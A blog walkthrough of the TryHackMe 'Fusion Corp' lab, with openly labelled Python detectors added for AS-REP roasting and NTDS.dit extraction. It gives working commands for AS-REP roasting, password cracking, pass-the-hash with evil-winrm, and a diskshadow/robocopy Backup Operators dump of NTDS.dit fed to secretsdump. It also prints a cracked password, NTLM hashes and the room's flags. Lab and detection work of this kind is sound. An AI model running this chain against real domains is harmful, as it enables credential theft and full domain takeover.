TL;DR Walkthrough of the TryHackMe Fusion Corp room.
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
I had just gotten around to finally consolidating our notes on using Windows VMs from Kali here when I noticed the Fusion Corp room. It’s a good ‘by the numbers’ enumeration, initial access, pivot, and escalate exercise. I refined and updated my notes along the way.
I’ll start with the hints as that may be all others need if they’re stuck:
- Enumerate the website, there’s a username list hidden in it
- ASREPRoast the usernames
- Enumerate AD once you gain initial access
- Once you find the account to pivot to, check its privileges
- Remember that Backup Operators can backup, copy, and dump NTDS.dit
Like many other THM VMs, this one kept becoming non-functional after 1 hour and I’d have to restart it. Hence the target IP changes during the walkthrough.
Scanning & enumeration
As always, start with nmap.
sudo nmap -sV -O 10.10.217.197
One will notice right away that the target is a DC for the corp.local domain and that it’s running a webserver.
Let’s see if there’s any useful info on the website.
#Enumerate for hidden directories using dirb
dirb http://10.10.217.197 /usr/share/wordlists/dirb/common.txt
We get a directory named backup with an employee name & username list. Nice, we don’t have to run Mishka’s Mangler. We can just feed the names into Kerbrute and/or ASREPRoast.
#Pull the usernames from the list (assumes each line of Raw.txt reads "First Last username", so the third field is the username)
Set-Location ".\THM stuff\THM Writeups\Fusion Corp"
$RawThings = Get-Content .\Raw.txt
ForEach($RawThing in $RawThings)
{
#Split on the space character, not the empty string, and take the third field
$Username = $RawThing.Split(' ')[2]
$Username | Out-File .\usernames.txt -Append
}
Copy/paste the contents of usernames.txt over to Kali & save them in a text file.
gedit /home/kali/Downloads/Wordlists/FusionCorpUsernames.txt
Gaining initial access
Add the target to the hosts file so Kali knows what IP to use for the domain name.
sudo gedit /etc/hosts
10.10.217.197 fusion.corp
ASREPRoast and see if we get lucky.
/home/kali/Downloads/impacket-master/build/scripts-3.9/GetNPUsers.py fusion.corp/ -no-pass -usersfile /home/kali/Downloads/Wordlists/FusionCorpUsernames.txt
I attempted cracking with hashcat, but with no joy.
#-m 18200 is Kerberos 5 AS-REP etype 23; -a 0 is the straight wordlist attack (-a 3 is a mask attack and would treat rockyou.txt as a mask, not a wordlist)
hashcat -m 18200 '$krb5asrep$23$lparker@FUSION.CORP:75cf284e2ec240d109cd0adef095cd96$2bfbf7f9ae13ae6f3ab82c31baa28dd3213bf6a062f8d39e71a5fd7812e806a9a8c2610a5502517156b35c56f34ebb12bf5c809232607871ab4a52571d0d06581133bc59817d1a2590f76e534ace00f997f117c61b559c711748fec04235127898c678b38d7f3aa33b9deffea94c02f577be3b02bb4bf3b9ca400e556ffe79c684ec4923d521eee224ba32f24e48a32d581e6e5dbd6588502441c89d1a95e533e3c5fa4909e1e0a9e34194985f717abe9812605365307fbdbccd3dce5bd5d68b16676e5439a8af14889923b9417a1c459884e9d454ce4693923a84bde09ecdb3eab78b9ec83d116e8fd2' -a 0 rockyou.txt
However john cracked it no problem.
john --wordlist=/home/kali/Downloads/Wordlists/rockyou.txt /home/kali/Downloads/hashes/Fusion
We get lparker \ !!abbylvzsvs2k6!
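From the defender's side, the step above leaves a clear trace on the domain controller: every AS-REP that GetNPUsers.py harvests is a Security event 4768 with Pre-Authentication Type 0 and RC4 encryption. The following is an added example, not code from the original walkthrough, that runs that check over a handful of constructed 4768 records and also tests the userAccountControl bit (0x400000, ADS_UF_DONT_REQUIRE_PREAUTH) that makes an account roastable in the first place. The field names and the flattened dict layout are assumptions about how the events were exported.

```python
"""Flag AS-REP roasting in Windows Security event 4768 (Kerberos TGT requested).

Added illustration, not part of the original walkthrough. It assumes the 4768
records have been flattened into dicts with the fields TargetUserName,
PreAuthType, TicketEncryptionType, Status and IpAddress, with the numeric
fields kept as the hex/decimal strings the event carries. The signal is a TGT
issued with Pre-Authentication Type 0 (no pre-auth, the condition the roast
depends on) and RC4-HMAC (0x17), the etype roasting tools ask for so the
AS-REP is crackable offline. Several such tickets from one source is the
spray that GetNPUsers.py -usersfile produces.
"""
from collections import defaultdict

NO_PREAUTH = "0"
RC4_HMAC = "0x17"
SUCCESS = "0x0"
# userAccountControl bit that disables pre-auth (ADS_UF_DONT_REQUIRE_PREAUTH).
DONT_REQ_PREAUTH = 0x400000

# Constructed sample events (not real logs). One source requests roastable
# TGTs for two accounts; a normal AES logon and a failed request for an
# unknown principal (Status 0x6, no ticket fields) are mixed in.
SAMPLE_EVENTS = [
    {"TargetUserName": "lparker", "PreAuthType": "0", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "10.10.14.5"},
    {"TargetUserName": "jmurphy", "PreAuthType": "0", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "10.10.14.5"},
    {"TargetUserName": "svc_web", "PreAuthType": "2", "TicketEncryptionType": "0x12",
     "Status": "0x0", "IpAddress": "10.10.30.7"},
    {"TargetUserName": "nobody", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff",
     "Status": "0x6", "IpAddress": "10.10.14.5"},
]


def is_asrep_roastable(event):
    """A successful TGT with no pre-auth and RC4 is exactly what gets harvested."""
    return (event["PreAuthType"] == NO_PREAUTH
            and event["TicketEncryptionType"] == RC4_HMAC
            and event["Status"] == SUCCESS)


def find_asrep_roast(events, threshold=2):
    """Group roastable TGTs by requesting IP; return {ip: sorted accounts}
    for sources that touched at least `threshold` distinct accounts."""
    by_source = defaultdict(set)
    for e in events:
        if is_asrep_roastable(e):
            by_source[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: sorted(users) for ip, users in by_source.items()
            if len(users) >= threshold}


def has_dont_req_preauth(user_account_control):
    """Mitigation check: True if the account's UAC flags disable pre-auth."""
    return bool(user_account_control & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    for ip, users in find_asrep_roast(SAMPLE_EVENTS).items():
        print(f"ALERT {ip}: AS-REP roast of {', '.join(users)}")
    # 0x400200 = NORMAL_ACCOUNT | DONT_REQ_PREAUTH, the state that needs fixing
    print("pre-auth disabled:", has_dont_req_preauth(0x400200))
```

The threshold on distinct accounts per source is what separates a single legitimately pre-auth-exempt service from a wordlist being sprayed; the UAC check is the one to run against Get-ADUser output so the flag gets removed before anyone roasts it.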
I checked for shares with crackmapexec. Remember that you have to escape special characters like ! in BASH by using a \ before them.
crackmapexec smb 10.10.21.236 -u lparker -p \!\!abbylvzsvs2k6\! --shares
smbclient \\\\10.10.21.236\\NETLOGON -U fusion.corp\\lparker --password \!\!abbylvzsvs2k6\!
There wasn’t anything interesting or useful on NETLOGON or SYSVOL however. One always wants to check these though as careless sysadmins and CTFs will both often leave plaintext credentials in logon scripts.
I realized a nifty trick around this time that I will probably use again: copy/paste the plaintext password into https://codebeautify.org/ntlm-hash-generator and get the NTLM. You can then PTH and log in without having to escape characters.
evil-winrm -i 10.10.21.236 -u lparker -H 5A2ED7B4BB2CD206CC884319B97B6CE8
Get-ADUser -Filter * -Properties * | Select-Object SamAccountName, Description
Pivot
Let’s log in as jmurphy after converting that password to NTLM.
evil-winrm -i 10.10.208.148 -u jmurphy -H 69C62E471CF61441BB80C5AF410A17A3
whoami /priv
whoami /groups
Backup Operators can back up the hard drive and then copy files out of the backup. This means Backup Operators can access NTDS.dit, download it to Kali, and dump it offline. We ran a lab project on doing this with secretsdump and DSInternals here.
Create a backup.txt on Kali containing the diskshadow script below. The trailing X on every line is deliberate: diskshadow drops the last character of each line when it reads a script file, so the padding character is what gets discarded rather than the command.
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
Then via evil-winrm logged in as jmurphy:
New-Item -Type Directory C:\Temp
Set-Location C:\Temp
upload /home/kali/Downloads/exploits/backup.txt
diskshadow /s backup.txt
#Once that's done
robocopy /b E:\Windows\ntds . ntds.dit
reg save hklm\system c:\temp\system
download ntds.dit /home/kali/Downloads/Pilfered/Fusion/ntds.dit
download C:\Temp\system /home/kali/Downloads/Pilfered/Fusion/system
#Dump NTDS.dit offline on Kali
cd /home/kali/Downloads/Pilfered/Fusion
python3 /home/kali/Downloads/impacket-master/examples/secretsdump.py -ntds ntds.dit -system system LOCAL
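The same chain is just as visible to a defender watching process creation on the DC: a diskshadow run with a script, a copy tool touching ntds.dit, and reg save of the SYSTEM hive, all from one Backup Operator within minutes. The following is an added example, not code from the original walkthrough, that correlates those three stages over constructed Security event 4688 (or Sysmon event 1) records; the field names, the epoch timestamps and the 15-minute window are assumptions.

```python
"""Spot the Backup Operators NTDS.dit extraction chain in process-creation logs.

Added illustration, not part of the original walkthrough. It assumes Windows
Security event 4688 (or Sysmon event 1) records already flattened into dicts
with SubjectUserName, NewProcessName, CommandLine and an epoch timestamp `ts`.
The chain it looks for is the one used above: diskshadow driven by a script,
a copy tool reaching for ntds.dit, and reg save of the SYSTEM hive (needed to
decrypt the database offline). A user who only runs one of the stages, such as
a scheduled backup job, is not flagged.
"""
import re
from collections import defaultdict

# (stage name, pattern over the command line). The chain only counts once every
# stage has fired after the first diskshadow invocation.
STAGES = [
    ("diskshadow_script", re.compile(r"\bdiskshadow(\.exe)?\b.*\s[/-]s\b", re.I)),
    ("ntds_copy", re.compile(r"\b(robocopy|xcopy|copy|esentutl)\b.*ntds\.dit", re.I)),
    ("system_hive_save", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I)),
]

# Constructed sample records (not real logs). jmurphy runs the full chain in
# just over a minute; backupsvc only runs a nightly diskshadow job plus a
# hive save, never touching ntds.dit.
SAMPLE_PROCS = [
    {"ts": 1000, "SubjectUserName": "jmurphy",
     "NewProcessName": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": "diskshadow /s backup.txt"},
    {"ts": 1060, "SubjectUserName": "jmurphy",
     "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy /b E:\Windows\ntds . ntds.dit"},
    {"ts": 1070, "SubjectUserName": "jmurphy",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\system c:\temp\system"},
    {"ts": 5000, "SubjectUserName": "backupsvc",
     "NewProcessName": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow /s C:\Scripts\nightly.txt"},
    {"ts": 5100, "SubjectUserName": "backupsvc",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\system D:\backups\system"},
]


def match_stage(command_line):
    """Return the stage name a command line belongs to, or None."""
    for name, pattern in STAGES:
        if pattern.search(command_line):
            return name
    return None


def find_ntds_chains(events, window=900):
    """Return {user: [stage names in order]} for users who complete every stage
    within `window` seconds of their first diskshadow script invocation."""
    per_user = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        stage = match_stage(e["CommandLine"])
        if stage:
            per_user[e["SubjectUserName"]].append((e["ts"], stage))

    hits = {}
    for user, seq in per_user.items():
        starts = [t for t, s in seq if s == "diskshadow_script"]
        if not starts:
            continue
        t0 = starts[0]
        seen = []
        for t, s in seq:
            if t0 <= t <= t0 + window and s not in seen:
                seen.append(s)
        if len(seen) == len(STAGES):
            hits[user] = seen
    return hits


if __name__ == "__main__":
    for user, stages in find_ntds_chains(SAMPLE_PROCS).items():
        print(f"ALERT {user}: {' -> '.join(stages)}")
```

The corresponding mitigation is cheaper than the detection: keep Backup Operators empty or limited to service accounts that actually run backups, since anyone in it has the same path to NTDS.dit that jmurphy had here.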
Escalate privileges
We can now log in as the Administrator and quickly find all the flags.
evil-winrm -i 10.10.208.148 -u Administrator -H 9653b02d945329c7270525c4c2a69c67
Get-ChildItem -Path C:\Users -Recurse -ErrorAction SilentlyContinue | Select-String "THM{"
C:\Users\Administrator\Desktop\flag.txt:1:THM{f72988e57bfc1deeebf2115e10464d15}
C:\Users\jmurphy\Desktop\flag.txt:1:THM{b4aee2db2901514e28db4242e047612e}
C:\Users\lparker\Desktop\flag.txt:1:THM{c105b6fb249741b89432fada8218f4ef}
lparker is of course user 1, jmurphy is 2, and the Administrator is 3.
Summary
This room was good practice overall. I learned a new trick and updated my cheatsheet for enumerating, attacking, and connecting to Windows domains from Kali.
References
smbclient syntax: https://www.samba.org/samba/docs/current/man-html/smbclient.1.html
Backup Operators & dumping NTDS.dit offline: https://happycamper84.medium.com/securing-ad-backups-8804b31da9fd
Handy table of hashcat mode mapped to hash type: https://hashcat.net/wiki/doku.php?id=example_hashes